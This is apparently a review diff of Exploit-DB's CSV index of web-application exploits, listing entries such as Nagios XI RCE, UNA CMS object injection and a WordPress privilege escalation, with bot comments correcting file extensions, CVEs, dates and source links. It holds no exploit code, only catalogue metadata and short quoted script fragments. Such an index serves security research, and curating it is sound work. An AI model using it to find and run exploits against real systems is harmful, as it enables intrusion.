38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
|
||||
38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
|
||||
|
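Review bot: the `codes` column for 52141 lists `CVE-2020-7656;CVE-2019-11358` against `jQuery 3.3.1`, but CVE-2020-7656 is the `.load()` script-tag stripping bug fixed in jQuery 1.9.0 and does not affect 3.3.1; the file's own demonstration of it is a plain `$('body').append('<script>…')`, which every jQuery version executes by design. Drop that CVE from the row, and consider `Prototype Pollution (PoC)` rather than `Exploit` in the description, since the file loads jQuery from a CDN itself instead of attacking a vulnerable page. The neighbouring rows 49766 and 49767 each carry the single CVE their file demonstrates and are the model to follow.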
@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
|
||||
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
|
||||
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
|
||||
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
|
||||
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
|
||||
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
|
||||
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
|
||||
|
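Review bot: 52138 is committed as `exploits/multiple/webapps/52138.txt` although the file is a Python script (`import argparse`, `class Nagiosxi()`, `if __name__ == "__main__":`) that its own usage line runs as `python3 exp.py ...`; the adjacent Python entry in this block uses `.py` (`51925.py`), and mirroring tools such as `searchsploit -m` hand users a `.txt` they must rename before it runs. Rename to `52138.py` and update the `file` column. The `date_published` value `2025-04-08` also does not match the file header `# Date: 17/02/2024`; see the note on the 52144 row for the column convention.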
@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
|
||||
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
|
||||
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
|
||||
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
|
||||
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
|
||||
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
|
||||
|
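Review bot: the description for 52139 reads `UNA CMS 14.0.0-RC - PHP Object Injection`, dropping the `4` from `14.0.0-RC4` that both the advisory title and `[-] Affected Versions: All versions from 9.0.0-RC1 to 14.0.0-RC4.` use, and the row leaves `source_url` empty although the advisory cites `https://karmainsecurity.com/KIS-2025-01` as the original (row 43362 in this block shows the column filled with its securiteam link). Suggest `UNA CMS 9.0.0-RC1 < 14.0.0-RC4 - PHP Object Injection`, or at least `14.0.0-RC4`, and add the KIS URL in the last column.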
@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
|
||||
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
|
||||
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
|
||||
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
|
||||
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
|
||||
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
|
||||
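Review bot: 52137 is indexed as `exploits/multiple/webapps/52137.txt` but its content is a Python script (`session.post(urljoin(target, "/wp-admin/admin-ajax.php"), ...)`, `if __name__ == "__main__":`), the same extension mismatch as 52138 in this commit; rename to `52137.py` so the `file` column points at a runnable script, and check the file's tail, which as rendered stops at `target = "http:`. The `codes` column is empty for `WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation`; if an identifier exists for the `user_registration_membership_register_member` role handling it should be recorded here so the row is searchable by CVE like its neighbours.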
|
|